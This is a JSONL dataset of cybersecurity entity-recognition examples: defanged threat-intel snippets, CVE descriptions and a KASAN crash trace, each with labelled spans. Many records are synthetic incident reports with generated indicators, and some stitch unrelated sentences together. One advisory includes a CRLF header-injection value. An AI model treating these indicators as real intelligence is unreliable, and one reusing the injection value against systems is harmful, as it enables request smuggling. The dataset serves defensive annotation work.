kasan_report+0x13c/0x170 mm/kasan/report.c:531\n __asan_report_load8_noabort+0x14/0x20 mm/kasan/report_generic.c:351\n __list_del_entry_valid+0xa6/0x130 lib/list_debug.c:62\n __list_del_entry include/linux/list.h:134 [inline]\n list_del_init include/linux/list.h:206 [inline]\n f2fs_inode_synced+0x100/0x2e0 fs/f2fs/super.c:1553\n f2fs_update_inode+0x72/0x1c40 fs/f2fs/inode.c:588\n f2fs_update_inode_page+0x135/0x170 fs/f2fs/inode.c:706\n f2fs_write_inode+0x416/0x790 fs/f2fs/inode.c:734\n write_inode fs/fs-writeback.c:1460 [inline]\n __writeback_single_inode+0x4cf/0xb80 fs/fs-writeback.c:1677\n writeback_sb_inodes+0xb32/0x1910 fs/fs-writeback.c:1903\n __writeback_inodes_wb+0x118/0x3f0 fs/fs-writeback.c:1974\n wb_writeback+0x3da/0xa00 fs/fs-writeback.c:2081\n wb_check_background_flush fs/fs-writeback.c:2151 [inline]\n wb_do_writeback fs/fs-writeback.c:2239 [inline]\n wb_workfn+0xbba/0x1030 fs/fs-writeback.c:2266\n process_one_work+0x73d/0xcb0 kernel/workqueue.c:2299\n worker_thread+0xa60/0x1260 kernel/workqueue.c:2446\n kthread+0x26d/0x300 kernel/kthread.c:386\n ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:295\n </TASK>\n\nAllocated by task 298:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x4b/0x70 mm/kasan/common.c:52\n kasan_save_alloc_info+0x1f/0x30 mm/kasan/generic.c:505\n __kasan_slab_alloc+0x6c/0x80 mm/kasan/common.c:333\n kasan_slab_alloc include/linux/kasan.h:202 [inline]\n slab_post_alloc_hook+0x53/0x2c0 mm/slab.h:768\n slab_alloc_node mm/slub.c:3421 [inline]\n slab_alloc mm/slub.c:3431 [inline]\n __kmem_cache_alloc_lru mm/slub.c:3438 [inline]\n kmem_cache_alloc_lru+0x102/0x270 mm/slub.c:3454\n alloc_inode_sb include/linux/fs.h:3255 [inline]\n f2fs_alloc_inode+0x2d/0x350 fs/f2fs/super.c:1437\n alloc_inode fs/inode.c:261 [inline]\n iget_locked+0x18c/0x7e0 fs/inode.c:1373\n f2fs_iget+0x55/0x4ca0 fs/f2fs/inode.c:486\n f2fs_lookup+0x3c1/0xb50 fs/f2fs/namei.c:484\n __lookup_slow+0x2b9/0x3e0 fs/namei.c:1689\n lookup_slow+0x5a/0x80 fs/namei.c:1706\n walk_component+0x2e7/0x410 fs/namei.c:1997\n lookup_last fs/namei.c:2454 [inline]\n path_lookupat+0x16d/0x450 fs/namei.c:2478\n filename_lookup+0x251/0x600 fs/namei.c:2507\n vfs_statx+0x107/0x4b0 fs/stat.c:229\n vfs_fstatat fs/stat.c:267 [inline]\n vfs_lstat include/linux/fs.h:3434 [inline]\n __do_sys_newlstat fs/stat.c:423 [inline]\n __se_sys_newlstat+0xda/0x7c0 fs/stat.c:417\n __x64_sys_newlstat+0x5b/0x70 fs/stat.c:417\n x64_sys_call+0x52/0x9a0 arch/x86/include/generated/asm/syscalls_64.h:7\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x3b/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x68/0xd2\n\nFreed by task 0:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x4b/0x70 mm/kasan/common.c:52\n kasan_save_free_info+0x2b/0x40 mm/kasan/generic.c:516\n ____kasan_slab_free+0x131/0x180 mm/kasan/common.c:241\n __kasan_slab_free+0x11/0x20 mm/kasan/common.c:249\n kasan_slab_free include/linux/kasan.h:178 [inline]\n slab_free_hook mm/slub.c:1745 [inline]\n slab_free_freelist_hook mm/slub.c:1771 [inline]\n slab_free mm/slub.c:3686 [inline]\n kmem_cache_free+0x\n---truncated---", "spans": {"Indicator: https://syzkaller.appspot.com/text?tag=CrashReport&x=16594c60580000": [[171, 246]], "System: Linux kernel": [[7, 19]], "Organization: Google": [[581, 587], [588, 594], [610, 616], [638, 644]], "Vulnerability: use-after-free": [[327, 341]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38578"}}
{"text": "For example , one commercial obfuscator , which cost €350 , was used for Trojans and Opfak.bo Obad.a Android vulnerabilities are used by criminals for three reasons : to bypass the code integrity check when installing an application ( vulnerability Master Key ) ; to enhance the rights of malicious applications , considerably extending their capabilities ; and to make it more difficult to remove malware . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . The encrypted payload is located in the .rdata section of hpqhvsei[ . ]dll and the decryption algorithm is an XOR loop where the XOR key is updated at each iteration . WithSecure has identified instances where the malware was delivered to victims through LinkedIn .", "spans": {"Malware: Opfak.bo Obad.a": [[85, 100]], "Vulnerability: zero-day vulnerabilities": [[411, 435]], "Vulnerability: CVE-2011-3544": [[532, 545]], "Vulnerability: CVE-2010-0738": [[593, 606]], "Organization: Dell SecureWorks'": [[639, 656]], "Indicator: hpqhvsei.dll": [[738, 754]], "Organization: WithSecure": [[848, 858]], "Malware: malware": [[894, 901]]}, "info": {"id": "cyberner_stix_train_007308", "source": "defanged_augment"}}
{"text": "This can be packaged and \" sold '' in many different ways to customers . As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip[.]com to establish free subdomains in their infrastructure . These development efforts may have resulted in the emergence of the WATERSPOUT backdoor . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": {"Malware: WATERSPOUT backdoor": [[340, 359]], "Indicator: changeip.com": [[202, 216]]}, "info": {"id": "cyberner_stix_train_007163", "source": "defanged_augment"}}
{"text": "We've recently discussed Corebot malware and its possible ties to btcshop[.]cc, a site selling stolen data.", "spans": {"Malware: Corebot malware": [[25, 40]], "Indicator: btcshop.cc": [[66, 78]]}, "info": {"id": "cyner2_train_001669", "source": "defanged_augment"}}
{"text": "RECEIVE_BOOT_COMPLETED - Allows the application to receive a broadcast after the system finishes booting . Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce[.]info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack .", "spans": {"Organization: banks": [[213, 218]], "Indicator: stevemike-fireforce.info": [[348, 374]]}, "info": {"id": "cyberner_stix_train_005738", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 154 [ . ] 219 [ . ] 125 [ . ] 236, the INTERPOL IR team identified WarmCookie running as /dev/shm/runtime.dll. The threat actor, believed to be Volt Typhoon, used WinPEAS for credential harvesting and Chisel for lateral movement. Exfiltrated data was sent to storage-data[ . ]com and loginnode[ . ]cc. The initial dropper (SHA1: 231dbd42550c6a131dd2d87f0bfcd1f9302bfcc5) was delivered via a phishing email from info@account-update[ . ]xyz. A second C2 node was observed at 192[.]96[.]150[.]203, with a persistence mechanism writing to C:\\ProgramData\\beacon.dll.", "spans": {"Indicator: 154.219.125.236": [[64, 97]], "Organization: INTERPOL": [[103, 111]], "Malware: WarmCookie": [[131, 141]], "Indicator: storage-data.com": [[323, 343]], "Indicator: loginnode.cc": [[348, 364]], "Indicator: 231dbd42550c6a131dd2d87f0bfcd1f9302bfcc5": [[393, 433]], "Indicator: info@account-update.xyz": [[475, 502]], "Indicator: 192.96.150.203": [[537, 557]]}, "info": {"id": "synth_v2_00304", "source": "defanged_augment"}}
{"text": "A program using FoundationNetworking in swift-corelibs-foundation is potentially vulnerable to CRLF ( ) injection in URLRequest headers. In this vulnerability, a client can insert one or several CRLF sequences into a URLRequest header value. When that request is sent via URLSession to an HTTP server, the server may interpret the content after the CRLF as extra headers, or even a second request. For example, consider a URLRequest to hxxp://example[.]com/ with the GET method. Suppose we set the URLRequest header \"Foo\" to the value \"Bar Extra-Header: Added GET /other HTTP/1.1\". When this request is sent, it will appear to the server as two requests: GET / HTTP/1.1 Foo: Bar Extra-Header: Added GET /other HTTP/1.1 In this manner, the client is able to inject extra headers and craft an entirely new request to a separate path, despite only making one API call in URLSession. If a developer has total control over the request and its headers, this vulnerability may not pose a threat. However, this vulnerability escalates if un-sanitized user input is placed in header values. If so, a malicious user could inject new headers or requests to an intermediary or backend server. Developers should be especially careful to sanitize user input in this case, or upgrade their version of swift-corelibs-foundation to include the patch below.", "spans": {"Indicator: http://example.com/": [[436, 457]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-3918"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can read data outside of bounds of heap allocated buffer in `tf.raw_ops.QuantizeAndDequantizeV3`. This is because the implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/11ff7f80667e6490d7b5174aa6bf5e01886e770f/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L237) does not validate the value of user supplied `axis` attribute before using it to index in the array backing the `input` argument. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/11ff7f80667e6490d7b5174aa6bf5e01886e770f/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L237": [[216, 363]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29553"}}
{"text": "Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define \"Webhooks\" as actions within the Rules engine. The url parameter in the webhook configuration does not appear to validate or restrict destination IP addresses. It accepts local addresses such as 127[.]0[.]0[.]1 or localhost. When a rule is triggered (Either manual trigger by manually calling the trigger endpoint or by a content update or any other triggers), the backend server executes an HTTP request to the user-supplied URL. Crucially, the server logs the full HTTP response in the rule execution log (lastDump field), which is accessible via the API. Which turns a \"Blind\" SSRF into a \"Full Read\" SSRF. As of time of publication, no patched versions are available.", "spans": {"Indicator: 127.0.0.1": [[361, 376]], "Vulnerability: SSRF": [[746, 750], [770, 774]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-24736"}}
{"text": "Analysis of QakBot sample (SHA256: b4d4850f626be905cb2e218c240d66abeba9ef0a2579c4555f09822e24402823) revealed command-and-control communication with 51 [ . ] 40 [ . ] 161 [ . ] 41 over port 4443. A secondary C2 channel was observed connecting to sync-cloud[[ . ]]work which resolved to 195 [ . ] 153 [ . ] 17 [ . ] 99. The malware binary was written to C:\\Windows\\INF\\setupapi.dev.dll and established persistence via a scheduled task.", "spans": {"Malware: QakBot": [[12, 18]], "Indicator: b4d4850f626be905cb2e218c240d66abeba9ef0a2579c4555f09822e24402823": [[35, 99]], "Indicator: 51.40.161.41": [[149, 179]], "Indicator: sync-cloud[.]work": [[246, 267]], "Indicator: 195.153.17.99": [[286, 317]]}, "info": {"id": "synth_00016", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed PsExec artifacts at /etc/cron.d/config.dat. Memory dump analysis confirmed execution of Sliver. Registry modifications pointed to persistence via /dev/shm/dropper.ps1. Network forensics identified connections to 192[.]50[.]113[.]64 and cloud-cdn[.]org. Email headers traced the initial vector to finance@secure-verify[.]net. File /var/tmp/winlogon.exe (MD5: e44101d9609bf1d52e4d28e3dba5f6ee) was identified as the initial dropper. A staging URL hxxp://login-backup[ . ]link/portal/verify resolved to 172[.]119[.]141[.]88. Secondary artifact hash: SHA256: ff6321b03e02967fb6c494bd6f72fc244a9dca9755e4f23fbe1acabfcddd2775.", "spans": {"Indicator: 192.50.113.64": [[284, 303]], "Indicator: cloud-cdn.org": [[308, 323]], "Indicator: finance@secure-verify.net": [[368, 395]], "Indicator: e44101d9609bf1d52e4d28e3dba5f6ee": [[430, 462]], "Indicator: http://login-backup.link/portal/verify": [[517, 559]], "Indicator: 172.119.141.88": [[572, 592]], "Indicator: ff6321b03e02967fb6c494bd6f72fc244a9dca9755e4f23fbe1acabfcddd2775": [[627, 691]]}, "info": {"id": "synth_v2_01213", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 13 [ . ] 37 [ . ] 164, the NCSC IR team identified PlugX running as C:\\Windows\\Tasks\\beacon.dll. The threat actor, believed to be Turla, used Nmap for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to portal-cdn[ . ]com and authlogin[.]tech. The initial dropper (SHA256: c1f9db217ef38335ec8dea7b5307c7d7248581188b919b9cac0b287dd94c2318) was delivered via a phishing email from helpdesk@credential-check[ . ]site. A second C2 node was observed at 98 [ . ] 175 [ . ] 204 [ . ] 220, with a persistence mechanism writing to C:\\Windows\\Tasks\\chrome_helper.exe.", "spans": {"Indicator: 172.13.37.164": [[64, 95]], "Organization: NCSC": [[101, 105]], "Malware: PlugX": [[125, 130]], "Indicator: portal-cdn.com": [[313, 331]], "Indicator: authlogin.tech": [[336, 352]], "Indicator: c1f9db217ef38335ec8dea7b5307c7d7248581188b919b9cac0b287dd94c2318": [[383, 447]], "Indicator: helpdesk@credential-check.site": [[489, 523]], "Indicator: 98.175.204.220": [[558, 590]]}, "info": {"id": "synth_v2_00314", "source": "defanged_augment"}}
{"text": "Artifact Analysis for PikaBot campaign:\nStage 1 dropper at C:\\Users\\Public\\Documents\\winlogon.exe - SHA256: 8edc463e72afddca73051c344d7aafeffb6c26bd56aa911a47852508ba214157\nStage 2 loader at C:\\Windows\\Temp\\dropper.ps1 - MD5: a63ebebea0f42b4313b4e0fd94662b0d\nFinal payload at C:\\Users\\admin\\Desktop\\sam.hive - SHA256: 2f4770a2f9bbbef360a31a0cb94cb52f635ad4cdedb06b390ab90b74fb4acb07\nExfiltration module - SHA256: 125d3f689d0ee9617b6cb9e60fe53a87973892fbe5e92e94994990b32fd8b875\nAll stages communicated with 96 [ . ] 55 [ . ] 55 [ . ] 217. PowerView signatures detected in Stage 2.", "spans": {"Malware: PikaBot": [[22, 29]], "Indicator: 8edc463e72afddca73051c344d7aafeffb6c26bd56aa911a47852508ba214157": [[108, 172]], "Indicator: a63ebebea0f42b4313b4e0fd94662b0d": [[226, 258]], "Indicator: 2f4770a2f9bbbef360a31a0cb94cb52f635ad4cdedb06b390ab90b74fb4acb07": [[318, 382]], "Indicator: 125d3f689d0ee9617b6cb9e60fe53a87973892fbe5e92e94994990b32fd8b875": [[413, 477]], "Indicator: 96.55.55.217": [[507, 537]]}, "info": {"id": "synth_v2_01956", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0[.]9[.]8[.]923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_php_pecl.php. When parsing the canal parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9745.", "spans": {"Indicator: 0.9.8.923": [[123, 138]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15434"}}
{"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.Wofopey.A4 Trojan.Bodegun.1 TSPY_AUTORUN_CD1027DD.RDXN Win32.Worm.AutoRun.ek W32/Worm.BLGL W32.SillyDC TSPY_AUTORUN_CD1027DD.RDXN Win.Trojan.Clicker-4047 Trojan.Win32.Fsysna.dilg Trojan.Win32.AutoRun.buecr Worm.Win32.A.AutoRun.329559 W32.W.AutoRun.lnZm Win32.HLLW.Autoruner.57463 BehavesLike[.]Win32[.]Virut[.]cz W32/Worm.PEBZ-4739 Worm/Win32.AutoRun Worm:Win32/Wofopey.A Trojan.Win32.Fsysna.dilg Worm/Win32.AutoRun.R1864 Trojan-Dropper.Serv.21221 W32/Autorun.KBE Win32/AutoRun.AEZ Win32.Trojan.Fsysna.Wqmj Worm.AutoRun!UZZkfeUh6N8 Win32/Trojan.c29", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.cz": [[332, 364]]}, "info": {"id": "cyner2_train_002347", "source": "defanged_augment"}}
{"text": "Researching the domain go-microstf[.]com , hosted at 45 [ . ] 63 [ . ] 10 [ . ] 99 , revealed yet another iteration of malicious executables .", "spans": {"Indicator: go-microstf.com": [[23, 40]], "Indicator: 45.63.10.99": [[53, 82]]}, "info": {"id": "cyberner_stix_train_002390", "source": "defanged_augment"}}
{"text": "Cybercriminals have launched a phishing campaign targeting senior executives in U.S. firms, using the EvilProxy phishing toolkit for credential harvesting and account takeover attacks. This campaign, initiated in July 2023, primarily targets sectors such as banking, financial services, insurance, property management, real estate, and manufacturing. The attackers exploit an open redirection vulnerability on the job search platform \"indeed[.]com,\" redirecting victims to malicious phishing pages impersonating Microsoft. EvilProxy functions as a reverse proxy, intercepting credentials, two-factor authentication codes, and session cookies to hijack accounts. The threat actors, known as Storm-0835 by Microsoft, have hundreds of customers who pay monthly fees for their services, making attribution difficult. The attacks involve sending phishing emails with deceptive links to Indeed, redirecting victims to EvilProxy pages for credential harvesting.", "spans": {"Indicator: indeed.com": [[435, 447]], "Organization: Microsoft": [[512, 521], [704, 713]], "Vulnerability: phishing": [[31, 39], [112, 120], [483, 491], [841, 849]]}, "info": {"source": "defanged_augment", "name": "Storm-0835"}}
{"text": "myyoula[.]ru sell-avito[ . ]ru sell-youla[ . ]ru sentel8ju67[ . ]com subito-li[ . ]pw subitop[.]pw web-gumtree[.]com whitehousejosh[.]com whitekalgoy3[ . ]com youlaprotect[ . ]ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . In this campaign , the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate[ . ]scr[ . ] The decoy document shown after infection is an Office document containing email addresses , phone numbers and contacts of members of official organizations such as the United Nations , UNICEF , Embassies linked to North Korea .", "spans": {"Organization: Trend Micro": [[329, 340]], "Malware: POWERSTATS v3": [[426, 439]], "Indicator: RC_Office_Coordination_Associate.scr.": [[548, 593]], "Organization: official organizations": [[727, 749]], "Organization: United Nations": [[762, 776]], "Organization: UNICEF": [[779, 785]], "Organization: Embassies": [[788, 797]], "Indicator: 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98": [[199, 263]], "Indicator: 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa": [[264, 328]], "Indicator: myyoula.ru": [[0, 12]], "Indicator: sell-avito.ru": [[13, 30]], "Indicator: sell-youla.ru": [[31, 48]], "Indicator: sentel8ju67.com": [[49, 68]], "Indicator: subito-li.pw": [[69, 85]], "Indicator: subitop.pw": [[86, 98]], "Indicator: web-gumtree.com": [[99, 116]], "Indicator: whitehousejosh.com": [[117, 137]], "Indicator: whitekalgoy3.com": [[138, 158]], "Indicator: youlaprotect.ru": [[159, 178]]}, "info": {"id": "cyberner_stix_train_005270", "source": "defanged_augment"}}
{"text": "Volt Typhoon, a Chinese state-sponsored threat actor, targeted U.S. critical infrastructure using living-off-the-land techniques. Microsoft and the Five Eyes intelligence alliance published advisories. The group gained initial access through Fortinet FortiGuard devices exploiting CVE-2024-21762. Post-compromise activity relied on netsh, ntdsutil, PowerShell, and wmic for discovery and credential access. The attackers used compromised SOHO routers at IP addresses 24 [ . ] 199 [ . ] 247 [ . ] 13, 67 [ . ] 230 [ . ] 163 [ . ] 214, and 162[.]245[.]191[.]78 as operational relay infrastructure. Web shells were deployed to C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx. Lateral movement used PsExec and Windows Management Instrumentation. Exfiltrated data was staged at C:\\Windows\\Temp\\cab_extract\\ before transfer. No custom malware was deployed; the group relied entirely on built-in Windows tools including cmd.exe, certutil, and bitsadmin.", "spans": {"Organization: Microsoft": [[130, 139]], "System: Fortinet FortiGuard": [[242, 261]], "Vulnerability: CVE-2024-21762": [[281, 295]], "Indicator: 24.199.247.13": [[467, 498]], "Indicator: 67.230.163.214": [[500, 532]], "Indicator: 162.245.191.78": [[538, 558]], "System: Windows": [[713, 720], [896, 903]]}, "info": {"id": "malware_00021", "source": "defanged_augment"}}
{"text": "This is an area where virus writers are actively working , resulting in a large number of technological innovations . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups . In case hpqhvsei[ . ]dll is loaded by a different process than hpqhvind[ . ]exe , the malicious code will not be decrypted and executed . Indicators of Attack are different from Indicators of Compromise IoC , the latter describing evidence of compromised network security .", "spans": {"Organization: defense contractors": [[180, 199]], "Organization: colleges": [[202, 210]], "Organization: universities": [[215, 227]], "Organization: law firms": [[230, 239]], "Organization: political organizations": [[246, 269]], "Organization: minority ethnic groups": [[315, 337]], "Indicator: hpqhvsei.dll": [[348, 364]], "Indicator: hpqhvind.exe": [[403, 419]]}, "info": {"id": "cyberner_stix_train_002071", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: SystemBC (SHA1: 4c22e645e79c79c035783888d19b397cf4a85a07). Upon execution on Progress Telerik, the sample creates C:\\Users\\admin\\Downloads\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 172[.]69[.]85[.]13 every 60 seconds and DNS queries to loginlogin[ . ]xyz. The second stage was fetched from hxxp://cachesync[.]online/gate.php and written to /var/tmp/config.dat. The payload uses Sharphound-style techniques for defense evasion. A secondary hash (SHA256: d3641f7e57e943f1a3bddb56a7c385eb3c682ef70fee3825a978f48f5769c794) was extracted from the unpacked payload.", "spans": {"Malware: SystemBC": [[25, 33]], "Indicator: 4c22e645e79c79c035783888d19b397cf4a85a07": [[41, 81]], "System: Progress Telerik": [[102, 118]], "Indicator: 172.69.85.13": [[252, 270]], "Indicator: loginlogin.xyz": [[307, 325]], "Indicator: hxxp://cachesync.online/gate.php": [[361, 395]], "Indicator: d3641f7e57e943f1a3bddb56a7c385eb3c682ef70fee3825a978f48f5769c794": [[524, 588]]}, "info": {"id": "synth_v2_00599", "source": "defanged_augment"}}
{"text": "Kyber ransomware variants targeting both Windows and VMware ESXi hypervisors were identified. The Windows variant (SHA256: 2277e5849ca525d261923a8a66eee1839570c7bbd7b62231d5da88ddef396cb4) encrypts files with .kyber extension while the ESXi variant targets virtual machine disk files. The ransom note directs victims to kyber-payment[ . ]onion via Tor browser and demands payment in Monero cryptocurrency.", "spans": {"Malware: Kyber": [[0, 5]], "Indicator: 2277e5849ca525d261923a8a66eee1839570c7bbd7b62231d5da88ddef396cb4": [[123, 187]], "System: Windows": [[41, 48], [98, 105]], "System: VMware ESXi": [[53, 64]], "Indicator: kyber-payment.onion": [[320, 343]]}, "info": {"id": "otx_00026", "source": "defanged_augment"}}
{"text": "Qualys detected a multi-stage attack chain. The initial phishing email from ceo@secure-verify[.]net contained a link to hxxps://cacheedge[.]io/callback. This redirected to hxxp://update-data[ . ]online/wp-content/uploads/doc.php on gateway-static[.]dev. A secondary email from admin@urgent-notice[ . ]online pointed to hxxp://cache-backup[ . ]com/panel/index.html which delivered Emotet. The final payload callback was hxxps://backup-cloud[ . ]online/api/v2/auth resolving to 199 [ . ] 52 [ . ] 236 [ . ] 235 via node-portal[ . ]tech.", "spans": {"Organization: Qualys": [[0, 6]], "Indicator: ceo@secure-verify.net": [[76, 99]], "Indicator: hxxps://cacheedge.io/callback": [[120, 151]], "Indicator: http://update-data.online/wp-content/uploads/doc.php": [[172, 228]], "Indicator: gateway-static.dev": [[232, 252]], "Indicator: admin@urgent-notice.online": [[277, 307]], "Indicator: hxxp://cache-backup.com/panel/index.html": [[319, 363]], "Malware: Emotet": [[380, 386]], "Indicator: https://backup-cloud.online/api/v2/auth": [[419, 462]], "Indicator: 199.52.236.235": [[476, 508]], "Indicator: node-portal.tech": [[513, 533]]}, "info": {"id": "synth_v2_01732", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Cobalt Strike (SHA256: 0825652d71b472ca7071d651c1100972ef293c292eede3c0a687d2b7dfe21a83). Upon execution on F5 BIG-IP, the sample creates C:\\Program Files\\Common Files\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 10 [ . ] 55 [ . ] 229 [ . ] 33 every 60 seconds and DNS queries to api-backup[ . ]link. The second stage was fetched from hxxp://storagecache[.]xyz/callback and written to /home/user/.config/runtime.dll. The payload uses Mythic-style techniques for defense evasion. A secondary hash (SHA256: 5d0112c7954f369f957a88d01a751e2b66b63d7a1ad8f1d47554815fb1aca617) was extracted from the unpacked payload.", "spans": {"Malware: Cobalt Strike": [[25, 38]], "Indicator: 0825652d71b472ca7071d651c1100972ef293c292eede3c0a687d2b7dfe21a83": [[48, 112]], "System: F5 BIG-IP": [[133, 142]], "Indicator: 10.55.229.33": [[281, 311]], "Indicator: api-backup.link": [[348, 367]], "Indicator: http://storagecache.xyz/callback": [[403, 437]], "Indicator: 5d0112c7954f369f957a88d01a751e2b66b63d7a1ad8f1d47554815fb1aca617": [[573, 637]]}, "info": {"id": "synth_v2_00614", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at /dev/shm/ntds.dit. Memory dump analysis confirmed execution of Impacket. Registry modifications pointed to persistence via /tmp/agent.py. Network forensics identified connections to 172 [ . ] 47 [ . ] 101 [ . ] 194 and backup-update[ . ]tech. Email headers traced the initial vector to helpdesk@account-update[.]xyz. File C:\\ProgramData\\update.dll (SHA256: 6bf125aa6367aafaf4717c64ccf8d15e02656e3e63b6d6ed59582bedecc69935) was identified as the initial dropper. A staging URL hxxps://authrelay[ . ]live/portal/verify resolved to 192 [ . ] 53 [ . ] 56 [ . ] 242. Secondary artifact hash: MD5: 9f081681c17f2fbcaa0d8052505e9179.", "spans": {"Indicator: 172.47.101.194": [[274, 306]], "Indicator: backup-update.tech": [[311, 333]], "Indicator: helpdesk@account-update.xyz": [[378, 407]], "Indicator: 6bf125aa6367aafaf4717c64ccf8d15e02656e3e63b6d6ed59582bedecc69935": [[449, 513]], "Indicator: hxxps://authrelay.live/portal/verify": [[568, 608]], "Indicator: 192.53.56.242": [[621, 652]], "Indicator: 9f081681c17f2fbcaa0d8052505e9179": [[684, 716]]}, "info": {"id": "synth_v2_01229", "source": "defanged_augment"}}
{"text": "Cannon acknowledges the receipt of file path by sending an email to sahro[.]bella7@post[.]cz with s[ . ]txt ( contains {SysPar = 65} string ) as the attachment , ok3 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"Malware: Cannon": [[0, 6]], "Indicator: sahro.bella7@post.cz": [[68, 92]], "Indicator: s.txt": [[98, 107]]}, "info": {"id": "cyberner_stix_train_002407", "source": "defanged_augment"}}
{"text": "CISA published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2023-39714 in SonicWall SMA. The attackers deployed RemcosRAT via Havoc, establishing C2 communication with 199 [ . ] 21 [ . ] 194 [ . ] 185 and cdndata[ . ]io. A secondary payload was downloaded from hxxps://cdnedge[ . ]site/wp-content/uploads/doc.php. The malware binary (MD5: c1e4206779fdf6b879eb697848e2dcdf) was dropped to C:\\Windows\\Tasks\\lsass.dmp. Phishing emails were sent from finance@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 101 [ . ] 19 [ . ] 55 [ . ] 116.", "spans": {"Organization: CISA": [[0, 4]], "Vulnerability: CVE-2023-39714": [[97, 111]], "System: SonicWall SMA": [[115, 128]], "Malware: RemcosRAT": [[153, 162]], "Indicator: 199.21.194.185": [[209, 241]], "Indicator: cdndata.io": [[246, 260]], "Indicator: hxxps://cdnedge.site/wp-content/uploads/doc.php": [[302, 353]], "Indicator: c1e4206779fdf6b879eb697848e2dcdf": [[380, 412]], "Indicator: finance@mail-service.info": [[488, 515]], "Indicator: 101.19.55.116": [[581, 612]]}, "info": {"id": "synth_v2_00195", "source": "defanged_augment"}}
{"text": "The original leak is no longer available on github[ . ]com , but a copy can be found here . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . The IXESHE campaign has been successfully executing targeted attacks since 2009 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"Organization: ITSec community": [[189, 204]], "Organization: FireEye": [[240, 247]], "Vulnerability: zero day vulnerability": [[277, 299]], "Vulnerability: CVE-2014-4148": [[302, 315]], "Organization: Google Analytics": [[405, 421]], "Organization: CSP": [[440, 443]], "Indicator: github.com": [[44, 58]]}, "info": {"id": "cyberner_stix_train_005631", "source": "defanged_augment"}}
{"text": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger[ . ]com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct", "spans": {"Indicator: iplogger.com": [[119, 135]], "Malware: GalaxyLoader": [[0, 12]], "System: WMI": [[163, 166]], "System: .NET": [[25, 29]]}, "info": {"source": "defanged_augment", "name": "GalaxyLoader"}}
